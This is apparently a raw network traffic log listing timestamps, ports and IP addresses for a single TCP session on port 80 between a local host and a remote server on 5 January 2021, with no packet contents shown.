Jan 5, 2021 10:06:48.844041109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844252110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844294071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844295979 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.844454050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844485998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844499111 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.844687939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844753981 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.844755888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844923019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.844980955 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.844990969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845242023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845303059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845341921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845345020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.845396996 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.845483065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845530033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845792055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845837116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845957994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.845985889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.846174955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.846226931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.846873999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.846901894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847095013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847127914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847275972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847306013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847501040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847541094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847718000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847748041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.847964048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848000050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848172903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848221064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848289967 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.848303080 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.848385096 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.848427057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848457098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848514080 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.848614931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848647118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.848790884 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.848898888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849091053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849124908 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849152088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849247932 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.849375963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849426985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849469900 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.849565029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849591970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849641085 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.849786997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849827051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.849875927 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.850028992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850052118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850122929 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.850208044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850244045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850289106 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.850440025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850472927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850545883 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.850691080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850723028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850888968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850909948 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.850923061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.850967884 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.850977898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851169109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851273060 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.851311922 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851337910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851473093 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.851484060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851737976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851763964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851901054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.851924896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.852170944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.852315903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.852554083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.852579117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.852776051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.852797031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.852845907 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.853041887 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853064060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853212118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853234053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853451967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853477955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853718996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853745937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853912115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.853944063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854126930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854162931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854383945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854440928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854485035 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.854650974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854675055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854808092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854840994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.854943991 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.854954004 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.854959011 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.854962111 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.854965925 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.855073929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.855113029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.855300903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.855344057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.855468035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.855607986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.855608940 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.855745077 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.855782032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856019020 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856057882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856184006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856206894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856391907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856523037 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856611967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856677055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856847048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.856870890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857105970 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.857110977 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.857137918 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857165098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857212067 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.857299089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857369900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857418060 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.857549906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857574940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857620955 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.857770920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857804060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.857855082 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.857969999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858032942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858092070 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.858196974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858287096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858418941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.858421087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858443975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858558893 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.858648062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858670950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858776093 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.858870029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858891010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.858925104 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.859137058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859160900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859271049 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.859364033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859394073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859468937 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.859574080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859596968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859639883 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.859797955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859828949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.859961033 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.860058069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860080004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860121965 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.860372066 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860394955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860481977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860486031 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.860505104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860548973 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.860740900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860765934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860862017 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.860941887 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.860965967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861078024 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.861172915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861196995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861289024 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.861380100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861421108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861511946 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.861639977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861668110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861804008 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.861825943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861850977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.861953020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.862050056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862073898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862196922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.862240076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.862279892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862313032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862354994 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.862514973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862538099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862617016 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.862715006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862737894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862903118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.862965107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.862987995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863090992 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.863197088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863224030 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863297939 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.863329887 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863394976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863486052 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.863493919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863607883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863661051 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.863668919 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.863768101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863872051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863945007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.863946915 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.864067078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864119053 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.864193916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864321947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864422083 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.864437103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864667892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864697933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864777088 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.864896059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864922047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.864983082 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.865138054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.865159988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.865248919 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.865331888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.865365028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.865571976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.865588903 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.865601063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.865816116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.865838051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866049051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866071939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866282940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866303921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866478920 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.866480112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866503954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866554022 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.866703033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866725922 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866832018 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.866925955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866955042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.866998911 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.867171049 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867192984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867235899 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.867412090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867435932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867469072 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.867608070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867635965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867686987 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.867841005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867865086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.867903948 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.868055105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.868089914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.868240118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.868300915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.868329048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.868400097 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.868549109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.868571997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.868654966 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.868766069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.871578932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.871654034 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.871803999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.871831894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.871900082 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.872014046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872035980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872077942 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.872216940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872246981 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872287035 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.872458935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872484922 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872616053 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.872682095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872704983 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872751951 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.872931004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.872952938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873115063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873146057 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.873189926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873238087 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.873359919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873454094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873564959 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.873608112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873677015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873744011 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.873863935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.873888969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874059916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874079943 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.874083996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874274969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874306917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874481916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874511957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874754906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874778032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.874974966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875001907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875235081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875267982 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.875422001 CET	80	49170	79.124.76.20	192.168.2.22
